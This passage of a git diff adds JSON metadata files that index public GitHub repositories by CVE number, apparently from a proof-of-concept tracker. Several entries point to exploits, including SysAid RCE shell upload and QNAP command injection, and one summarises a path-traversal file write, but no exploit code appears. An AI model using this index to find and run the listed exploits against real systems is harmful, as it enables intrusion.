}, + "html_url": "https:\/\/github.com\/Freax13\/cve-2023-46813-poc", + "description": null, + "fork": false, + "created_at": "2023-05-29T15:10:43Z", + "updated_at": "2024-08-08T20:02:03Z", + "pushed_at": "2024-01-07T15:20:55Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46818.json b/2023/CVE-2023-46818.json new file mode 100644 index 0000000000..a22de02f82 --- /dev/null +++ b/2023/CVE-2023-46818.json @@ -0,0 +1,33 @@ +[ + { + "id": 869481497, + "name": "CVE-2023-46818-python-exploit", + "full_name": "bipbopbup\/CVE-2023-46818-python-exploit", + "owner": { + "login": "bipbopbup", + "id": 24678431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24678431?v=4", + "html_url": "https:\/\/github.com\/bipbopbup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bipbopbup\/CVE-2023-46818-python-exploit", + "description": "CVE-2023-46818 IPSConfig Python exploit", + "fork": false, + "created_at": "2024-10-08T11:22:16Z", + "updated_at": "2024-10-08T11:46:57Z", + "pushed_at": "2024-10-08T11:46:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4683.json b/2023/CVE-2023-4683.json new file mode 100644 index 0000000000..c4795f488f --- /dev/null +++ b/2023/CVE-2023-4683.json @@ -0,0 +1,33 @@ +[ + { + "id": 697961473, + "name": "CVE-2023-4683-Test", + "full_name": "Songg45\/CVE-2023-4683-Test", + "owner": { + "login": "Songg45", + "id": 22947231, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22947231?v=4", + "html_url": "https:\/\/github.com\/Songg45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Songg45\/CVE-2023-4683-Test", + "description": "CVE-2023-4683 - Test", + "fork": false, + "created_at": "2023-09-28T20:49:33Z", + "updated_at": "2024-05-08T01:09:58Z", + "pushed_at": "2023-09-28T21:29:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46865.json b/2023/CVE-2023-46865.json new file mode 100644 index 0000000000..00e1438610 --- /dev/null +++ b/2023/CVE-2023-46865.json @@ -0,0 +1,33 @@ +[ + { + "id": 716779558, + "name": "Crater-CVE-2023-46865-RCE", + "full_name": "asylumdx\/Crater-CVE-2023-46865-RCE", + "owner": { + "login": "asylumdx", + "id": 68108995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68108995?v=4", + "html_url": "https:\/\/github.com\/asylumdx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asylumdx\/Crater-CVE-2023-46865-RCE", + "description": "Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)", + "fork": false, + "created_at": "2023-11-09T21:22:47Z", + "updated_at": "2024-03-05T08:55:59Z", + "pushed_at": "2023-11-10T07:50:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46870.json b/2023/CVE-2023-46870.json new file mode 100644 index 0000000000..7a76ad62ed --- /dev/null +++ b/2023/CVE-2023-46870.json @@ -0,0 +1,33 @@ +[ + { + "id": 798984358, + "name": "CVE-2023-46870", + "full_name": "Chapoly1305\/CVE-2023-46870", + "owner": { + "login": "Chapoly1305", + "id": 25316415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25316415?v=4", + "html_url": "https:\/\/github.com\/Chapoly1305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chapoly1305\/CVE-2023-46870", + "description": null, + "fork": false, + "created_at": "2024-05-10T22:18:53Z", + "updated_at": "2024-06-13T23:36:56Z", + "pushed_at": "2024-06-13T23:36:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46948.json b/2023/CVE-2023-46948.json new file mode 100644 index 0000000000..641e11c87e --- /dev/null +++ b/2023/CVE-2023-46948.json @@ -0,0 +1,33 @@ +[ + { + "id": 709837062, + "name": "CVE-2023-46948", + "full_name": "AzraelsBlade\/CVE-2023-46948", + "owner": { + "login": "AzraelsBlade", + "id": 148983455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148983455?v=4", + "html_url": "https:\/\/github.com\/AzraelsBlade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AzraelsBlade\/CVE-2023-46948", + "description": null, + "fork": false, + "created_at": "2023-10-25T13:50:41Z", + "updated_at": "2024-08-10T10:48:12Z", + "pushed_at": "2024-08-10T10:48:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46954.json b/2023/CVE-2023-46954.json new file mode 100644 index 0000000000..df82f5ea4c --- /dev/null +++ b/2023/CVE-2023-46954.json @@ -0,0 +1,33 @@ +[ + { + "id": 713406536, + "name": "CVE-2023-46954", + "full_name": "jakedmurphy1\/CVE-2023-46954", + "owner": { + "login": "jakedmurphy1", + "id": 44781280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44781280?v=4", + "html_url": "https:\/\/github.com\/jakedmurphy1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakedmurphy1\/CVE-2023-46954", + "description": null, + "fork": false, + "created_at": "2023-11-02T13:09:52Z", + "updated_at": "2023-11-02T13:09:52Z", + "pushed_at": "2023-11-08T18:44:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4696.json b/2023/CVE-2023-4696.json new file mode 100644 index 0000000000..5c5d9c3c32 --- /dev/null +++ b/2023/CVE-2023-4696.json @@ -0,0 +1,33 @@ +[ + { + "id": 685896765, + "name": "CVE-2023-4696", + "full_name": "mnqazi\/CVE-2023-4696", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4696", + "description": "https:\/\/medium.com\/@mnqazi\/cve-2023-4696-account-takeover-due-to-improper-handling-of-jwt-tokens-in-memos-v0-13-2-13104e1412f3", + "fork": false, + "created_at": "2023-09-01T09:02:03Z", + "updated_at": "2023-09-01T09:02:04Z", + "pushed_at": "2023-09-01T09:07:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46974.json b/2023/CVE-2023-46974.json new file mode 100644 index 0000000000..7f768aa28c --- /dev/null +++ b/2023/CVE-2023-46974.json @@ -0,0 +1,33 @@ +[ + { + "id": 713487289, + "name": "CVE-2023-46974", + "full_name": "yte121\/CVE-2023-46974", + "owner": { + "login": "yte121", + "id": 55489792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4", + "html_url": "https:\/\/github.com\/yte121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yte121\/CVE-2023-46974", + "description": "POC", + "fork": false, + "created_at": "2023-11-02T16:08:19Z", + "updated_at": "2023-11-02T16:08:20Z", + "pushed_at": "2023-11-02T16:09:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4698.json b/2023/CVE-2023-4698.json new file mode 100644 index 0000000000..24c21dec06 --- /dev/null +++ b/2023/CVE-2023-4698.json @@ -0,0 +1,33 @@ +[ + { + "id": 685905090, + "name": "CVE-2023-4698", + "full_name": "mnqazi\/CVE-2023-4698", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-4698", + "description": null, + "fork": false, + "created_at": "2023-09-01T09:24:08Z", + "updated_at": "2023-09-08T12:33:05Z", + "pushed_at": "2023-09-04T05:47:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46980.json b/2023/CVE-2023-46980.json new file mode 100644 index 0000000000..20ac049d3d --- /dev/null +++ b/2023/CVE-2023-46980.json @@ -0,0 +1,33 @@ +[ + { + "id": 713486009, + "name": "CVE-2023-46980", + "full_name": "sajaljat\/CVE-2023-46980", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46980", + "description": null, + "fork": false, + "created_at": "2023-11-02T16:05:23Z", + "updated_at": "2023-11-02T16:05:24Z", + "pushed_at": "2023-11-02T16:09:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4699.json b/2023/CVE-2023-4699.json new file mode 100644 index 0000000000..da88096d95 --- /dev/null +++ b/2023/CVE-2023-4699.json @@ -0,0 +1,33 @@ +[ + { + "id": 720198895, + "name": "Citrix-Bleed-Buffer-Overread-Demo", + "full_name": "Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo", + "owner": { + "login": "Scottzxor", + "id": 65826410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65826410?v=4", + "html_url": "https:\/\/github.com\/Scottzxor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Scottzxor\/Citrix-Bleed-Buffer-Overread-Demo", + "description": "This code functionally approximates the Citrix Bleed vulnerability (CVE-2023-4699).", + "fork": false, + "created_at": "2023-11-17T19:55:30Z", + "updated_at": "2023-11-20T06:22:48Z", + "pushed_at": "2023-11-17T20:01:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46998.json b/2023/CVE-2023-46998.json new file mode 100644 index 0000000000..91da9cd606 --- /dev/null +++ b/2023/CVE-2023-46998.json @@ -0,0 +1,33 @@ +[ + { + "id": 713074877, + "name": "CVE-2023-46998", + "full_name": "soy-oreocato\/CVE-2023-46998", + "owner": { + "login": "soy-oreocato", + "id": 79870826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79870826?v=4", + "html_url": "https:\/\/github.com\/soy-oreocato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soy-oreocato\/CVE-2023-46998", + "description": null, + "fork": false, + "created_at": "2023-11-01T19:36:38Z", + "updated_at": "2023-12-19T12:57:31Z", + "pushed_at": "2023-11-01T19:41:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47014.json b/2023/CVE-2023-47014.json new file mode 100644 index 0000000000..78371c763b --- /dev/null +++ b/2023/CVE-2023-47014.json @@ -0,0 +1,33 @@ +[ + { + "id": 718503412, + "name": "CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "full_name": "emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "owner": { + "login": "emirhanerdogu", + "id": 32299032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32299032?v=4", + "html_url": "https:\/\/github.com\/emirhanerdogu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirhanerdogu\/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS", + "description": null, + "fork": false, + "created_at": "2023-11-14T08:08:08Z", + "updated_at": "2023-12-03T08:21:31Z", + "pushed_at": "2023-11-14T08:34:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47102.json b/2023/CVE-2023-47102.json new file mode 100644 index 0000000000..b976fde05c --- /dev/null +++ b/2023/CVE-2023-47102.json @@ -0,0 +1,33 @@ +[ + { + "id": 720393369, + "name": "CVE-2023-47102", + "full_name": "nitipoom-jar\/CVE-2023-47102", + "owner": { + "login": "nitipoom-jar", + "id": 149907798, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149907798?v=4", + "html_url": "https:\/\/github.com\/nitipoom-jar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitipoom-jar\/CVE-2023-47102", + "description": null, + "fork": false, + "created_at": "2023-11-18T10:52:40Z", + "updated_at": "2023-11-18T12:30:55Z", + "pushed_at": "2023-11-18T12:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47108.json b/2023/CVE-2023-47108.json new file mode 100644 index 0000000000..b9ccb44cc9 --- /dev/null +++ b/2023/CVE-2023-47108.json @@ -0,0 +1,33 @@ +[ + { + "id": 819728794, + "name": "govuln-CVE-2023-47108", + "full_name": "bahe-msft\/govuln-CVE-2023-47108", + "owner": { + "login": "bahe-msft", + "id": 73816700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73816700?v=4", + "html_url": "https:\/\/github.com\/bahe-msft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bahe-msft\/govuln-CVE-2023-47108", + "description": null, + "fork": false, + "created_at": "2024-06-25T05:05:26Z", + "updated_at": "2024-06-25T05:08:40Z", + "pushed_at": "2024-06-25T05:08:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47119.json b/2023/CVE-2023-47119.json new file mode 100644 index 0000000000..b1308cba97 --- /dev/null +++ b/2023/CVE-2023-47119.json @@ -0,0 +1,64 @@ +[ + { + "id": 717901692, + "name": "CVE-2023-47119", + "full_name": "BaadMaro\/CVE-2023-47119", + "owner": { + "login": "BaadMaro", + "id": 72421091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72421091?v=4", + "html_url": "https:\/\/github.com\/BaadMaro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaadMaro\/CVE-2023-47119", + "description": "A POC for CVE-2023-47119", + "fork": false, + "created_at": "2023-11-12T23:34:07Z", + "updated_at": "2023-11-16T13:35:52Z", + "pushed_at": "2023-11-17T16:40:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733767538, + "name": "CVE-2023-47119", + "full_name": "Cristiano100\/CVE-2023-47119", + "owner": { + "login": "Cristiano100", + "id": 59809524, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59809524?v=4", + "html_url": "https:\/\/github.com\/Cristiano100", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cristiano100\/CVE-2023-47119", + "description": null, + "fork": false, + "created_at": "2023-12-20T04:43:15Z", + "updated_at": "2023-12-21T06:28:47Z", + "pushed_at": "2023-12-20T04:43:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47129.json b/2023/CVE-2023-47129.json new file mode 100644 index 0000000000..f958a0ad2b --- /dev/null +++ b/2023/CVE-2023-47129.json @@ -0,0 +1,33 @@ +[ + { + "id": 718117758, + "name": "CVE-2023-47129", + "full_name": "Cyber-Wo0dy\/CVE-2023-47129", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-47129", + "description": "Statamic CMS versions <4.33.0 vulnerable to \"Remote Code Execution\" ", + "fork": false, + "created_at": "2023-11-13T12:21:52Z", + "updated_at": "2024-01-23T20:00:05Z", + "pushed_at": "2023-11-13T12:24:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47179.json b/2023/CVE-2023-47179.json new file mode 100644 index 0000000000..ecd7620912 --- /dev/null +++ b/2023/CVE-2023-47179.json @@ -0,0 +1,33 @@ +[ + { + "id": 713813686, + "name": "CVE-2023-47179", + "full_name": "RandomRobbieBF\/CVE-2023-47179", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-47179", + "description": "WooODT Lite <= 2.4.6 - Missing Authorization to Arbitrary Options Update (Subscriber+)", + "fork": false, + "created_at": "2023-11-03T09:39:30Z", + "updated_at": "2024-08-12T20:32:59Z", + "pushed_at": "2023-11-03T10:26:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47218.json b/2023/CVE-2023-47218.json new file mode 100644 index 0000000000..d0042a3c11 --- /dev/null +++ b/2023/CVE-2023-47218.json @@ -0,0 +1,33 @@ +[ + { + "id": 759618943, + "name": "CVE-2023-47218", + "full_name": "passwa11\/CVE-2023-47218", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-47218", + "description": "CVE-2023-47218: QNAP QTS and QuTS Hero Unauthenticated Command Injection (FIXED)", + "fork": false, + "created_at": "2024-02-19T02:15:21Z", + "updated_at": "2024-02-19T02:15:22Z", + "pushed_at": "2024-02-19T02:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47246.json b/2023/CVE-2023-47246.json new file mode 100644 index 0000000000..c2b6b3b26a --- /dev/null +++ b/2023/CVE-2023-47246.json @@ -0,0 +1,136 @@ +[ + { + "id": 719913434, + "name": "CVE-2023-47246-EXP", + "full_name": "W01fh4cker\/CVE-2023-47246-EXP", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2023-47246-EXP", + "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)", + "fork": false, + "created_at": "2023-11-17T07:03:06Z", + "updated_at": "2024-10-22T17:59:22Z", + "pushed_at": "2023-12-07T02:55:01Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2023-47246", + "exploit", + "redteam", + "sysaid" + ], + "visibility": "public", + "forks": 13, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 721997669, + "name": "CVE-2023-47246", + "full_name": "rainbowhatrkn\/CVE-2023-47246", + "owner": { + "login": "rainbowhatrkn", + "id": 147452376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147452376?v=4", + "html_url": "https:\/\/github.com\/rainbowhatrkn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rainbowhatrkn\/CVE-2023-47246", + "description": "exploit for cve-2023-47246 SysAid RCE (shell upload)", + "fork": false, + "created_at": "2023-11-22T08:13:51Z", + "updated_at": "2023-11-22T08:13:52Z", + "pushed_at": "2023-11-22T08:13:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721999227, + "name": "CVE-2023-47246", + "full_name": "tucommenceapousser\/CVE-2023-47246", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-47246", + "description": null, + "fork": false, + "created_at": "2023-11-22T08:18:11Z", + "updated_at": "2023-11-24T03:09:53Z", + "pushed_at": "2023-11-23T05:07:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892941082, + "name": "cve-2023-47246-poc", + "full_name": "XiaomingX\/cve-2023-47246-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2023-47246-poc", + "description": "CVE-2023-47246 是 SysAid On-Premise 软件(版本 23.3.36 之前)中的一个路径遍历漏洞。攻击者可以利用该漏洞将文件写入 Tomcat 的 webroot 目录,从而在服务器上执行任意代码。", + "fork": false, + "created_at": "2024-11-23T05:21:22Z", + "updated_at": "2024-12-08T18:36:59Z", + "pushed_at": "2024-11-23T05:24:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47253.json b/2023/CVE-2023-47253.json new file mode 100644 index 0000000000..d9b7303b00 --- /dev/null +++ b/2023/CVE-2023-47253.json @@ -0,0 +1,64 @@ +[ + { + "id": 859921995, + "name": "CVE-2023-47253", + "full_name": "OpenXP-Research\/CVE-2023-47253", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2023-47253", + "description": "CVE-2023-47253 | Qualitor <= 8.20 RCE", + "fork": false, + "created_at": "2024-09-19T14:06:47Z", + "updated_at": "2024-10-30T15:04:49Z", + "pushed_at": "2024-10-30T15:03:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 860037261, + "name": "CVE-2023-47253", + "full_name": "gmh5225\/CVE-2023-47253", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-47253", + "description": "CVE-2023-47253 | Qualitor <= 8.20 RCE", + "fork": false, + "created_at": "2024-09-19T17:52:40Z", + "updated_at": "2024-09-19T17:52:40Z", + "pushed_at": "2024-09-19T14:01:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47355.json b/2023/CVE-2023-47355.json new file mode 100644 index 0000000000..8f3cbf5aff --- /dev/null +++ b/2023/CVE-2023-47355.json @@ -0,0 +1,35 @@ +[ + { + "id": 712696330, + "name": "com.eypcnnapps.quickreboot", + "full_name": "actuator\/com.eypcnnapps.quickreboot", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.eypcnnapps.quickreboot", + "description": "CVE-2023-47355", + "fork": false, + "created_at": "2023-11-01T02:02:16Z", + "updated_at": "2024-02-02T02:41:58Z", + "pushed_at": "2023-11-01T02:41:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47355" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-47400.json b/2023/CVE-2023-47400.json new file mode 100644 index 0000000000..3880e30bb5 --- /dev/null +++ b/2023/CVE-2023-47400.json @@ -0,0 +1,37 @@ +[ + { + "id": 748574391, + "name": "CVE-2023-47400", + "full_name": "LucasVanHaaren\/CVE-2023-47400", + "owner": { + "login": "LucasVanHaaren", + "id": 29121316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29121316?v=4", + "html_url": "https:\/\/github.com\/LucasVanHaaren", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasVanHaaren\/CVE-2023-47400", + "description": "Proof of Concept for the CVE-2023-47400", + "fork": false, + "created_at": "2024-01-26T09:35:47Z", + "updated_at": 